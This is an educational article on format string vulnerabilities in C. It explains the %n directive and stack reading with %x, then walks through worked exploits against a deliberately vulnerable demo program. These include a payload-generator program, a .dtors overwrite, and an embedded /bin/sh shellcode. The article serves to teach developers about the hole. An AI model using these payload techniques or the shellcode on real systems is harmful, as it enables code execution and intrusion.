Avoiding security holes when developing an application - Part 4: format strings

ArticleCategory:

Software Development

AuthorImage:

[image of the authors]

TranslationInfo:

Original in fr

fr to en:

en to en:

AboutTheAuthor:

Christophe Blaess is an independent aeronautics engineer. He is a Linux fan and does much of his work on this system. He coordinates the translation of the man pages as published by the Linux Documentation Project.

Christophe Grenier is a 5th year student at the ESIEA, where he works as a sysadmin too. He has a passion for computer security.

Frédéric Raynal has been using Linux for many years because it doesn't pollute, it doesn't use hormones, MSG or animal by-products... only sweat and craft.

Abstract

For some time by now messages announcing format string based exploits are getting more and more numerous. This article explains where the danger comes from and will show that an attempt to save six bytes is enough to compromise the security of a program.

ArticleIllustration:[illustration]

[article illustration]

ArticleBody:[The real article: put the text and html-codes here]

Where is the danger ?

Most security flaws come from bad configuration or laziness. This rule holds true for format strings.

It is often necessary to use null terminated strings in a program. Where inside the program is not important here. This vulnerabilty is again about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough:

printf("%s", str);

However, a programmer can decide to save time and six bytes while writing only:

printf(str);

With "economy" in mind, this programmer opens a potential hole in his work. He is satisfied with passing a single string as an argument, which he wanted simply to display without any change. However, this string will be parsed to look for directives of formatting (%d, %g...) . When such a format character is discovered, the corresponding argument is looked for in the stack.

We will start introducing the family of printf() functions. At least, we expect everyone knows them ... but not in detail, so we will deal with the lesser known aspects of these routines. Then, we will see how to get the necessary information to exploit such a mistake. Finally, we will show how all this fits together with a single example.

Deep inside format strings

In this part, we will consider the format strings. We will start with a summary about their use and we will discover a rather little known format instruction that will reveal all its mystery.

printf() : they told me a lie !

Note for non-French residents: we have in our nice country a racing cyclist who pretended for months not to have taken dope while all the other members of his team admitted it. He claims that if he has been doped, he didn't know it. So, a famous puppet show used the French sentence "on m'aurait menti !" which gave me the idea for this title.

Let us start with what we all learned in our programming's handbooks: most of the input/output C functions use data formatting, which means that one has not only to provide the data for reading/writing, but also how it shold be displayed. The following program illustrates this:

/* display.c */
#include <stdio.h>

main() {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);
}
Running it displays:
>>gcc display.c -o display
>>./display
int  : 64 97
char : @ a
The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), which leads for a to display its ASCII value. On the other hand, the second printf() converts the integer variable i to the corresponding ASCII character code, that is 64.

Nothing new - everything conforms to the many functions with a prototype similar to the printf() function :

  1. one argument, in the form of a character string (const char *format) is used to specify the selected format;
  2. one or more other optional arguments, containing the variables in which values are formatted according to the indications given in the previous string.

Most of our programming lessons stop there, providing a non exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to force the precision...) But, there is another one never talked about:%n. Here is what the printf()'s man page says about it:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Here is the most important thing of this article: this argument makes it possible to write into a pointer variable , even when used in a display function !

Before continuing, let us say that this format also exists for functions from the scanf() and syslog() family.

Time to play

We are going to study the use and the behavior of this format through small programs. The first, printf1, shows a very simple use:

/* printf1.c */
1: #include <stdio.h>
2: 
3: main() {
4:   char *buf = "0123456789";
5:   int n;
6:   
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }

The first printf() call displays the string "0123456789" which contains 10 characters. The next %n format writes this value to the variable n:

>>gcc printf1.c -o printf1
>>./printf1 
0123456789
n = 10
Let's slightly transform our program by replacing the instruction printf() line 7 with the following one:
7:   printf("buf=%s%n\n", buf, &n);

Running this new program confirms our idea: the variable n is now 14, (10 characters from the buf string variable added to the 4 characters from the "buf=" constant string, contained in the format string itself).

So, we know the %n format counts every character that appears in the format string. Moreover, as we will demonstrate the printf2 program, it counts even further:

/* printf2.c */

#include <stdio.h>

main() {
  char buf[10];
  int n, x = 0;
  
  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
}
The use of the snprintf() function is to prevent from buffer overflows. The variable n should then be 10:
>>gcc printf2.c -o printf2
>>./printf2
l = 9
n = 100
Strange ? In fact, the %n format considers the amount of characters that should have been written. This example shows that truncating due to the size specification is ignored.

What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:

/* printf3.c */

#include <stdio.h>

main() {
  char buf[5];
  int n, x = 1234;

  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, sizeof buf);
}
printf3 contains some differences compared to printf2: We get the following display:
>>gcc printf3.c -o printf3
>>./printf3
l = 4
n = 5
buf = [0123] (5)
The first two lines are not surprising. The last one illustrates the behavior of the printf() function :
  1. the format string is deployed, according to the commands1 it contains, which provides the string "00000\0";
  2. the variables are written where and how they should, which is illustrated by the copying of x in our example. The string then looks like "01234\0";
  3. last, sizeof buf - 1 bytes2 from this string is copied into the buf destination string, which give us "0123\0"
This is not perfectly exact but reflects the general process. For more details, the reader should refer to the GlibC sources, and particularly vfprintf() in the ${GLIBC_HOME}/stdio-common directory.

Before ending with this part, let's add that it is possible to get the same results writing in the format string in a slightly different way. We previously used the format called precision (the dot '.'). Another combination of formatting instructions leads to an identical result: 0n, where n is the the number width , and 0 means that the spaces should be replaced with 0 just in case the whole width is not filled up.

Now that you know almost everything about format strings, and most specifically about the %n format, we will study their behaviors.

The stack and printf()

Walking through the stack

The next program will guide us all along this section to understand how printf() and the stack are related:

/* stack.c */
 1: #include <stdio.h>
 2: 
 3: int
 4  main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
 9:
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }
This program just copies an argument into the buffer character array . We take care not to overflow some important data (format strings are really more accurate than buffer overflows ;-)
>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)
It works as we expected :) Before going further, let's examine what happens from the stack point of view while calling snprintf() at line 8.
Fig. 1 : the stack at the beginning of snprintf()
snprintf()

Figure 1 describes the state of the stack when the program enters the snprintf() function (we'll see that it is not true ... but this is just to give you an idea of what's happening). We don't care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values located in %ebp and %ebp+4 contain the respective backups of the %ebp and %ebp+4 registers. Next come the arguments of the function snprintf():

  1. the destination address;
  2. the number of characters to be copied;
  3. the address of the format string argv[1] which also acts as data.
Lastly, the stack is topped of with the tmp array of 4 characters , the 64 bytes of the variable buffer and the i integer variable .

The argv[1] string is used at the same time as format string and data. According to the normal order of the snprintf() routine, argv[1] appears instead of the format string. Since you can use a format string without format directives (just text), everything is fine :)

What happens when argv[1] also contains formatting ? ? Normally, snprintf() interprets them as they are ... and there is no reason why it should act differently ! But here, you may wonder what arguments are going to be used as data for formatting the resulting output string. In fact, snprintf() grabs data from the stack! You can see that from our stack program:

>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)

First, the "123 " string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number according to our little endian x86 processor.

>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)

Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the 4 first bytes of buffer. However, buffer contains the "123 " string, which can be seen as the 0x20333231 (0x20=space, 0x31='1'...) hexadecimal number. So, for each %x, snprintf() "jumps" 4 bytes further in buffer (4 because unsigned int takes 4 bytes on x86 processor). This variable acts as double agent by:

  1. writing to the destination;
  2. read input data for the format.
We can "climb up" the stack as long as our buffer contains bytes:
>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378 
         0x333837] (63)
i = 1 (bffff654)

Even higher

The previous method allows us to look for important information such as the return address of the function who created the stack holding the buffer. However, it is possible, with the right format, to look for data further than the vulnerable buffer.

You can find an occasionally useful format when it is necessary to swap between the parameters (for instance, while displaying date and time). We add the m$ format, right after the %, where m is an integer >0. It gives the position of the variable to use in the arguments list (starting from 1):

/* explore.c */
#include <stdio.h>

  int
main(int argc, char **argv) {

  char buf[12];

  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);

  printf("[%s] (%d)\n", buf, strlen(buf));
}

The format using m$ enables us to go up where we want in the stack, as we could do using gdb:

>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)

The character \ is necessary here to protect the $ and to prevent the shell from interpreting it. In the first three calls we visit contents of the buf variable. With %4\$x, we get the %ebp saved register, and then with the next %5\$x, the %eip saved register (a.k.a. the return address). The last 2 results presented here show the argc variable value and the address contained in *argv (remember that **argv means that *argv is an addresses array).

In short ...

This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return value of a function, an address... However, we saw at the beginning of this article that we could write using functions of the printf()'s type: doesn't this look like a wonderful potential vulnerability ?

First steps

Let's go back to the stack program:

>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)
        
We give as input string:
  1. the i variable address;
  2. a formatting instruction (%.496x);
  3. a second formatting instruction (%n) which will write into the given address.
To determine the i variable address (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can note it, i has a new value :) The given format string and the stack organization make snprintf() look like :
snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);

The first four bytes (containing the i address) are written at the beginning of buffer. The %.496x format allows us to get rid of the tmp variable which is at the beginning of the stack. Then, when the formatting instruction is the %n, the address used is the i's one, at the beginning of buffer. Although the precision required is 496, snprintf writes only sixty bytes at maximum (because the length of the buffer is 64 and 4 bytes have already been written). The value 496 is arbitrary, and is just used to manipulate the "byte counter". We have seen that the %n format saves the amount of bytes that should have been written. This value is 496, to which we have to add 4 from the 4 bytes of the i address at the beginning of buffer. Therefore, we have counted 500 bytes. This value will be written into the next address found in the stack, which is the i's address.

We can go even further with this example. To change i, we needed to know its address ... but sometimes the program itself provides it:

/* swap.c */
#include <stdio.h>

main(int argc, char **argv) {

  int cpt1 = 0;
  int cpt2 = 0;
  int addr_cpt1 = &cpt1;
  int addr_cpt2 = &cpt2;

  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
}

Running this program shows that we can control the stack (almost) as we want:

>>./swap AAAA
AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
AAAA
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
AAAA
cpt1 = 4
cpt2 = 0

As you can see, depending on the argument, we can change either cpt1, or cpt2. The %n format expects an address, that is why we can't directly act on the variables, ( i.e. using %3$n (cpt2) or %4$n (cpt1) ) but have to go through pointers. The latter are "fresh meat" with enormous possibilities for modification.

Variations on the same topic

The examples previously presented come from a program compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won't get the same results on your own box. Indeed, the functions of the *printf() type change according to the glibc and the compilers do not carry out the same operations at all.

The program stuff highlights these differences:

/* stuff.c */
#include <stdio.h>

main(int argc, char **argv) {
  
  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";

  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }

  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
}

The aaa and bbb arrays are used as delimiters in our journey through the stack. Therefore we know that when we find 424242, the following bytes will be in buffer. Table 1 presents the differences according to the versions of the glibc and compilers.

Tab. 1 : Variations around glibc    
Compiler
glibc
Display
gcc-2.95.3 2.1.3-16 buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63)
egcs-2.91.66 2.1.3-22 buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63)
gcc-2.96 2.1.92-14 buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)
gcc-2.96 2.2-12 buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)

Next in this article, we will continue to use egcs-2.91.66 and the glibc-2.1.3-22 , but don't be surprised if you note differences on your machine.

Exploitation of a format bug

While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.

With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, ...), we just have to say where and what to write for %n doing the job for us.

The vulnerable program

You can exploit a format bug different ways. P. Bouchareine's article (Format string vulnerability) shows how to overwrite the return address of a function, so we'll show something else.
/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();

  memset(buffer, 0, sizeof(buffer));

  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);

  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
  
  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

  return ptrf();
}

int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for(i=0;i<argc;i++)
    printf("%d %p\n",i,argv[i]);
  
  exit(vuln(argv[1]));
}

int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  fflush(stdout);
  return 0;
}

int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  fflush(stdout);
  return 0;
}

We define a variable named ptrf which is a pointer to a function. We will change the value of this pointer to run the function we choose.

First example

First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:

>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"

>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"

The first call here gives us what we need: 3 words (one word = 4 bytes for x86 processors) separate us from the beginning of the buffer variable. The second call, with AAAA%3\$x as argument, confirms this.

Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, something like 128Mbytes). All computers can't afford such a use of memory ... but the one we are using can :) It last around 20 seconds on a dual-pentium 350 MHz:

>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"

What did we do? We just provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack, with a precision of 134514256 (we already have written 4 bytes from the address of ptrf, so we still have to write 134514260-4=134514256 bytes). At last, we write the wanted value in the given address (%3$n).

Memory problems: divide and conquer

However, as we mentioned it, it isn't always possible to use 128MB buffers. The format %n waits for a pointer to an integer, i.e. four bytes. It is possible to alter its behavior to make it point to a short int - only 2 bytes - thanks to the instruction %hn. We thus cut the integer to which we want to write two parts. The largest writable size will then fit in the 0xffff bytes (65535 bytes). Thus in the previous example, we transform the operation writing " 0x8048654 at the 0xbffff5d4 address" into two successive operations : :

The second write operation takes place on the high bytes of the integer, which explains the swap of 2 bytes.

However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. First, we have to write the smallest value between the two. Then, the second formatting will only use the difference between the needed number and the first number written as precision. For instance in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 - 0x0804). Each %hn placed right after will record the right amount of bytes.

We just have to specify where to write to both %hn. The m$ operator will greatly help us. If we save the addresses at the beginning of the vulnerable buffer, we just have to go up through the stack to find the offset from the beginning of the buffer using the m$ format. Then, both addresses will be at an offset of m and m+1. As we use the first 8 bytes in the buffer to save the addresses to overwrite, the first written value must be decreased by 8.

Our format string looks like:

"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max - val. min.]x%[offset+1]$hn"

The build program uses three arguments to create a format string:

  1. the address to overwrite;
  2. the value to write there;
  3. the offset (counted as words) from the beginning of the vulnerable buffer.
/* build.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value, 
      unsigned int where) {

  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128; 
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;

  char *buf;

  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom

  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);

  /* let's build */
  if (valh < vall) {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */

         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */         
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         valh-8,              /* set the value for the first %hn */  
         where,               /* the %hn for the high part */        
                                                         
         vall-valh,           /* set the value for the second %hn */ 
         where+1              /* the %hn for the low part */               
         );
         
  } else {

     snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%hdx"            /* set the value for the first %hn */    
         "%%%d$hn"            /* the %hn for the high part */          
                                                           
         "%%.%hdx"            /* set the value for the second %hn */   
         "%%%d$hn"            /* the %hn for the low part */           
         ,                                                     
         b3+2, b2, b1, b0,    /* high address */                       
         b3, b2, b1, b0,      /* low address */                        
                                                           
         vall-8,              /* set the value for the first %hn */    
         where+1,             /* the %hn for the high part */          
                                                           
         valh-vall,           /* set the value for the second %hn */   
         where                /* the %hn for the low part */
         );
  }
  return buf;
}

int
main(int argc, char **argv) {

  char *buf;

  if (argc < 3)
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
          strtoul(argv[2], NULL, 16),  /* valeur */
          atoi(argv[3]));              /* offset */
  
  fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}

The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let's check what we get now, without any memory troubles.

First, our simple example allows us guessing the offset:

>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"

It is always the same : 3. Since our program is done to explain what happens, we already have all the other information we would need : the ptrf and accesForbidden() addresses . We build our buffer according to these:

>>./vuln `./build 0xbffff5d4 0x8048664 3` 
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"

Nothing happens! In fact, since we used a longer buffer than in the previous example in the format string, the stack moved. ptrf has gone from 0xbffff5d4 to 0xbffff5b4). Our values need to be adjusted:
>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"

We won!!!

Other exploits

In this article, we started by proving that the format bugs are a real vulnerability. Another important concern is how to exploit them. Buffer overflow exploits rely on writing to the return address of a function. Then, you have to try (almost) at random and pray a lot for your scripts to find the right values (even the eggshell must be full of NOP). You don't need all this with format bugs and you are no more restricted to the return address overwriting.

We have seen that format bugs allow us to write anywhere. So, we will see now an exploitation based on the .dtors section.

When a program is compiled with gcc, you can find a constructor section (named .ctors) and a destructor (named .dtors). Each of these sections contains pointers to functions to be carried out before entering the main() function and after exiting, respectively.

/* cdtors */

void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));

int main() {
  printf("in main()\n");
}

void start(void) {
  printf("in start()\n");
}

void end(void) {
  printf("in end()\n");
}
Our small program shows that mechanism:
>>gcc cdtors.c -o cdtors
>>./cdtors
in start()
in main()
in end()
Each one of these sections is built in the same way:
>>objdump -s -j .ctors cdtors

cdtors:     file format elf32-i386

Contents of section .ctors:
 804949c ffffffff dc830408 00000000           ............    
>>objdump -s -j .dtors cdtors

cdtors:     file format elf32-i386

Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000           ............    
We check that the indicated addresses match those of our functions (attention : the preceding objdump command gives the addresses in little endian):
>>objdump -t cdtors | egrep "start|end"
080483dc g     F .text  00000012              start
080483f0 g     F .text  00000012              end
So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.

Let us apply this to vuln by using the format string. First, we have to get the location in memory of these sections, which is really easy when you have the binary at hand ;-) Simply use the objdump like we did previously:

>> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049844 ffffffff 00000000                    ........        
Here it is ! We have everything we need now.

The goal of the exploitation is to replace the address of a function in one of these sections with the one of the functions we want to execute. If those sections are empty, we just have to overwrite the 0x00000000 which indicates the end of the section. This will cause a segmentation fault because the program won't find this 0x00000000, it will take the next value as the address of a function, which is probably not true.

In fact, the only interesting section is the destructor section (.dtors): we have no time to do anything before the constructor section (.ctors). Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (the 0xffffffff):

Let's go back to our example. We replace the 0x00000000 in section .dtors, placed in 0x8049848=0x8049844+4, with the address of the accesForbidden() function, already known (0x8048664):

>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664

before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)

Everything runs fine, the main() helloWorld() and then exit. The destructor is then called. The section .dtors starts with the address of accesForbidden(). Then, since there is no other real function address, the expected coredump happens.

Please, give me a shell

We have seen simple exploits here. Using the same principle we can get a shell, either by passing the shellcode through argv[] or an environment variable to the vulnerable program. We just have to set the right address (i.e. the address of the eggshell) in the section .dtors.

Right now, we know:

However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).

The idea is based on recursive calls of the function exec*():

/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


main(int argc, char **argv) {

  char **env;
  char **arg;
  int nb = atoi(argv[1]), i;

  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;
  
  arg    = (char **) malloc(sizeof(char *) * nb);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;

  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");

  /* recall */
  if (nb == 0) 
    exit(0);
  execve(argv[0], arg, env);
}
The input is an nb integer that the program will recursively calle itself nb+1 times:
>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

We immediately notice the allocated addresses for arg and argv don't move anymore after the second call. We are going to use this property in our exploit. We just have to change our build program slightly to make it call itself before calling vuln. So, we get the exact argv address, and the one of our shellcode.:

/* build2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}

int
main(int argc, char **argv) {
  
  char *buf;
  char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if(argc < 3)
    return EXIT_FAILURE;

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        &shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    execlp(argv[0], argv[0], buf, &shellcode, argv[1], argv[2], NULL);

  } else {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* adresse */
        argv[2],
        atoi(argv[4]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));

    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }

  return EXIT_SUCCESS;
}

The trick is that we know what to call according to the number of arguments the program received. To start our exploit, we just give to build2 the address we want to write to and the offset. We don't have to give the value anymore since it is going to be evaluated by our successive calls.

To succeed, we need to keep the same memory layout between the different calls of build2 and then vuln (that is why we call the build() function, in order to use the same memory footprint):

>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)

